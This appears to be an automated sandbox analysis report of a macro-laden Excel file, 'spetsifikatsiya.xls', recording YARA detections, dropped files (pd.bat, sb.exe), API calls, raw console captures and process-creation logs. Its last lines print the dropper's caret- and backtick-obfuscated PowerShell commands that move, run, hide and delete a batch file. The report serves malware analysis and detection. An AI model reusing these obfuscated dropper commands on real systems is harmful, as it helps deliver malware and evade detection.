Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_004276C4	27_2_004276C4
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_00689D67	27_2_00689D67

Source: spetsifikatsiya.xls

OLE indicator, VBA macros: true

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 006876A0 appears 87 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 006811C5 appears 76 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 006B08FC appears 807 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 00411C35 appears 40 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 006850AE appears 35 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 005CEF10 appears 135 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 00411FB1 appears 172 times
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: String function: 00696B06 appears 45 times

Source: C:\Users\user\AppData\Roaming\sb.exe

Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

Jump to behavior

Source: spetsifikatsiya.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research

Source: classification engine

Classification label: mal100.expl.evad.winXLS@40/19@2/4

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

27_2_0045624F

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_0042A2F9 __EH_prolog,CoCreateInstance,CoUninitialize,

27_2_0042A2F9

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,

27_2_004231B3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\66EE0000

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\sb.exe	Mutant created: \Sessions\1\BaseNamedObjects\614c1de794e5e2f8f0d3a4fae3ccc083

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDFB4.tmp

Jump to behavior

Source: spetsifikatsiya.xls

OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..&.....................#.................F...............F.......A.....`IC........v.....................KJ.......&.....l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....L................T.............}..v....8M......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....HQ......0...............H.o.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....R................T.............}..v.....R......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....V...... ...............H.o.....".......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....HW................T.............}..v.....W......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..&.............y=.v....G..................j......o...............T.............}..v....X^......0.................&.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j....._................T.............}..v....._......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..&.............y=.v....S..................j......o...............T.............}..v.....d......0.................&.....^.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....pe................T.............}..v.....e......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..&.............y=.v...._..................j......o...............T.............}..v.....k......0.................&.....Z.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._..................j.....k................T.............}..v....Hl......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..&.............y=.v....k..................j......o...............T.............}..v.....s......0.................&.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j.....s................T.............}..v....Ht......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....w......0...............H.o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w..................j.....x................T.............}..v.... y......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j......o...............T.............}..v.....\|......0...............H.o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....h}................T.............}..v.....}......0.................o.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................F...............F.......A.....`IC........v.....................KJ.............r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................5.j....0s}...............T.............}..v.....s}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v.....w}.....0...............X.I.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../................5.j....xx}...............T.............}..v.....x}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....}}.....0...............X.I.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;................5.j.....}}...............T.............}..v....@~}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G...............P4.j......I...............T.............}..v....h.}.....0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................5.j.... .}...............T.............}..v......}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S...............P4.j......I...............T.............}..v......}.....0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................5.j......}...............T.............}..v......}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._...............P4.j......I...............T.............}..v....(.}.....0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................5.j......}...............T.............}..v....`.}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k...............P4.j......I...............T.............}..v....(.}.....0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................5.j......}...............T.............}..v....`.}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v....p.}.....0...............X.I.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w................5.j....(.}...............T.............}..v......}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......P4.j......I...............T.............}..v....8.}.....0...............X.I.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................5.j......}...............T.............}..v....p.}.....0.................I.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............................@{1.....................D.........................5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............m.o.d.e........./.......................0........$.J............/...............X...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D............... .1.8.,.1. .............................d.......m.o.d.e..........D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D.......................................................d.......m.o.d.e..........D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................@{1.....................D.........................5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............c.o.l.o.r......./.......................0........$.J............/...............X...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... .F.E. .................................d.......c.o.l.o..........D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`.......................................................d.......c.o.l.o..........D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`.......................................................D.........................5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............s.e.t.l.o.c.a.l./.......................0........$.J............/...............X...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`.......................................................d.......s.e.t.l..........D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ...................................................J....................D.......`{.J..............5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................f.o.r...........`{.J....................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.F...........`{.J....................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... .%.i. .i.n. ...=.4.-.5.................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............(.'.v.e.r.'.). .d.o. .5.................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............s.e.t...........d.o. .5.................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... .V.E.R.S.I.O.N.=.%.i...%.j. ...................s.e.t............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`................................D5.....................d........................D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................p.6......................................i5......................................i5.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............s.e.t............\6.......................5...............6........J....x.......................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... .V.E.R.S.I.O.N.=.6...1. .......................s.e.t....i5......................................i5.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................=.6...1.........................s.e.t....i5......................................i5.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................`{.J....................D........$.J..............5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............".6...1.". .=.=. .".1.0...0.". .................i.f. ............D5..................... .......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............(................D5..................... .......................d1......C..v....(..........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................................................(................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............e.c.h.o.........}..v............................`.......B.......................................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........D5.............h.......0.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... ..... ..........D5..............................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........}..v....................................U.......................8............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................................................r.e.g............D5.....................z.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>..............................................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. ..........................................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................T........................D5.............8...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v............................P.......t....................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.t. .2. . ...................................t.i.m.e..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>............................................. ./.t. ..........D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. ......................................... ./.t. ..........D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1...............................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................s.c.h.t.a.s.k.s.}..v............................................................x............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ........................................................................D.......s.c.h.t..........D5.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>.....................................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. .................................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1...............................................D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v............................P............................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.t. .3. . ...................................t.i.m.e..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............1.>............................................. ./.t. ..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............n.u.l. ......................................... ./.t. ..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... ..... .........d1......................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............r.e.g...........d1......................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............................................................r.e.g............D5.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`..................................................................J.............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............). ................................................J.............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`................................D5.....................d........................D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................".6...1.". .=.=. .".6...3.". ...................i.f. ............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................(................D5.............................................d1......C..v....(..........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................................................(................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..v....................................#.......................................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........D5.............h.......2.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... ..........D5..............................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........}..v....................................5.......................8............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v............................P.......X....................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................s.c.h.t.a.s.k.s.}..v....................................v.......................x............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............t.i.m.e.o.u.t...}..v............................P............................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... ./.t. .3. . ...................................t.i.m.e..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................`{.J....................D........$.J..............5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............".6...1.". .=.=. .".6...2.". ...................i.f. ............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............(................D5.............................................d1......C..v....(..........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................................................(................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................e.c.h.o.........}..v............................................................................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D5.............h...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........}..v............................................................8............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............t.i.m.e.o.u.t...}..v............................P.......8....................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`............... ./.t. .2. . ...................................t.i.m.e..........D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................`...............1.>............................................. ./.t. ..........D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............n.u.l. ......................................... ./.t. ..........D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D............... ..... .........d1...............................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............s.c.h.t.a.s.k.s.}..v............................D.......].......................x............... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D.......................................................D.......s.c.h.t..........D5.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............1.>.....................................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............n.u.l. .................................t........................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D............... ..... .........d1...............................................D5.............x...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............t.i.m.e.o.u.t...}..v............................P.......{....................................... ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............). ................................................J.............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D................................D5.....................d........................D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............................`{.J....................D........$.J..............5.............H...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............x.......2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............i.f. ...........`{.J....................d.......X%.J.............D5.............(...............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............".6...1.". .=.=. .".6...1.". ...................i.f. ............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............(................D5.............................................d1......C..v....(..........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............C.m.d...........................................(................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............................................................C.m.d............D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................D...............). ..............D5..............................................D5.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.............................B.......................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................X.......(.P.....................................................................................................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: sb.exe	String found in binary or memory: id-cmc-addExtensions
Source: sb.exe	String found in binary or memory: set-addPolicy

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
